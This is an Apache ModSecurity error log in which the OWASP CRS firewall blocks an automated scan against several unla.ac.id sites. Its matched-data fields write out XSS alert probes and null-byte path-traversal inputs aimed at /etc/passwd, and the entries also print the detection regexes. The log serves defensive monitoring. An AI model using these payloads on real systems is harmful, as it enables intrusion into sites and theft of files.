[Tue Aug 29 11:52:38.592983 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:expires_in. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onerror= found within ARGS:expires_in: <img src onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "www.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO15lsCo-f0AAAfWOP4AAAAL"]
[Tue Aug 29 11:52:38.689341 2023] [:error] [pid 2575] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:fileid: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15lsCo-f0AAAoPuWcAAAAM"]
[Tue Aug 29 11:52:39.773863 2023] [:error] [pid 2575] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://google.com<Svg/onload=alert(document.domain)> found within TX:1: google.com<Svg/onload=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/fmlurlsvc/"] [unique_id "ZO15l8Co-f0AAAoPuWoAAAAM"]
[Tue Aug 29 11:52:40.070951 2023] [:error] [pid 2580] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://google.com<Svg/onload=alert(document.domain)> found within TX:1: google.com<Svg/onload=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/fmlurlsvc/"] [unique_id "ZO15mMCo-f0AAAoUJbYAAAAB"]
[Tue Aug 29 11:52:40.087417 2023] [:error] [pid 2531] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://google.com<Svg/onload=alert(document.domain)> found within TX:1: google.com<Svg/onload=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/fmlurlsvc/"] [unique_id "ZO15mMCo-f0AAAnjjR4AAAAX"]
[Tue Aug 29 11:52:40.600276 2023] [:error] [pid 2574] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://google.com<Svg/onload=alert(document.domain)> found within TX:1: google.com<Svg/onload=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/fmlurlsvc/"] [unique_id "ZO15mMCo-f0AAAoO51UAAAAK"]
[Tue Aug 29 11:52:40.602468 2023] [:error] [pid 2575] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://google.com<Svg/onload=alert(document.domain)> found within TX:1: google.com<Svg/onload=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/fmlurlsvc/"] [unique_id "ZO15mMCo-f0AAAoPuW8AAAAM"]
[Tue Aug 29 11:52:40.635228 2023] [:error] [pid 2580] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://google.com<Svg/onload=alert(document.domain)> found within TX:1: google.com<Svg/onload=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/fmlurlsvc/"] [unique_id "ZO15mMCo-f0AAAoUJbsAAAAB"]
[Tue Aug 29 11:52:40.636221 2023] [:error] [pid 2531] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:out. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:out: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/client/manage/ourphp_out.php"] [unique_id "ZO15mMCo-f0AAAnjjSMAAAAX"]
[Tue Aug 29 11:52:40.637112 2023] [:error] [pid 2575] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:out. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:out: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/client/manage/ourphp_out.php"] [unique_id "ZO15mMCo-f0AAAoPuXAAAAAM"]
[Tue Aug 29 11:52:40.655259 2023] [:error] [pid 2581] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:out. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:out: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/client/manage/ourphp_out.php"] [unique_id "ZO15mMCo-f0AAAoVqnkAAAAH"]
[Tue Aug 29 11:52:40.661405 2023] [:error] [pid 2566] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:out. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:out: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/client/manage/ourphp_out.php"] [unique_id "ZO15mMCo-f0AAAoGFacAAAAE"]
[Tue Aug 29 11:52:40.680574 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:out. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:out: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/client/manage/ourphp_out.php"] [unique_id "ZO15mMCo-f0AAAnd3J0AAAAI"]
[Tue Aug 29 11:52:41.646285 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:out. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:out: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/client/manage/ourphp_out.php"] [unique_id "ZO15mcCo-f0AAAfWOQwAAAAL"]
[Tue Aug 29 11:52:41.697078 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15mcCo-f0AAAnd3KEAAAAI"]
[Tue Aug 29 11:52:41.704720 2023] [:error] [pid 2579] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15mcCo-f0AAAoT7OgAAAAD"]
[Tue Aug 29 11:52:41.735462 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15mcCo-f0AAAnd3KIAAAAI"]
[Tue Aug 29 11:52:41.760356 2023] [:error] [pid 2576] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO15mcCo-f0AAAoQ3LUAAAAN"]
[Tue Aug 29 11:52:41.788527 2023] [:error] [pid 2574] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15mcCo-f0AAAoO514AAAAK"]
[Tue Aug 29 11:52:42.530525 2023] [:error] [pid 2575] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =../../../../../../../../../../ found within ARGS:controller: =../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO15msCo-f0AAAoPuXgAAAAM"]
[Tue Aug 29 11:52:42.541214 2023] [:error] [pid 2574] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:debug_host. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:debug_host: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15msCo-f0AAAoO518AAAAK"]
[Tue Aug 29 11:52:42.545351 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:debug_host. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:debug_host: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15msCo-f0AAAoLfJMAAAAG"]
[Tue Aug 29 11:52:42.545545 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:debug_host. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:debug_host: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15msCo-f0AAAlUlu0AAAA0"]
[Tue Aug 29 11:52:42.553462 2023] [:error] [pid 2576] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =../../../../../../../../../../ found within ARGS:controller: =../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15msCo-f0AAAoQ3LgAAAAN"]
[Tue Aug 29 11:52:42.581687 2023] [:error] [pid 2575] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =../../../../../../../../../../ found within ARGS:controller: =../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15msCo-f0AAAoPuXoAAAAM"]
[Tue Aug 29 11:52:42.587440 2023] [:error] [pid 2525] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:debug_host. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:debug_host: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO15msCo-f0AAAnd3KYAAAAI"]
[Tue Aug 29 11:52:42.590164 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15msCo-f0AAAlUlu4AAAA0"]
[Tue Aug 29 11:52:42.611389 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =../../../../../../../../../../ found within ARGS:controller: =../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15msCo-f0AAAlUlu8AAAA0"]
[Tue Aug 29 11:52:42.613267 2023] [:error] [pid 2574] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: =../../../../../../../../../../ found within ARGS:controller: =../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15msCo-f0AAAoO52IAAAAK"]
[Tue Aug 29 11:52:43.532131 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:debug_host. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:debug_host: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO15m8Co-f0AAAlUlvMAAAA0"]
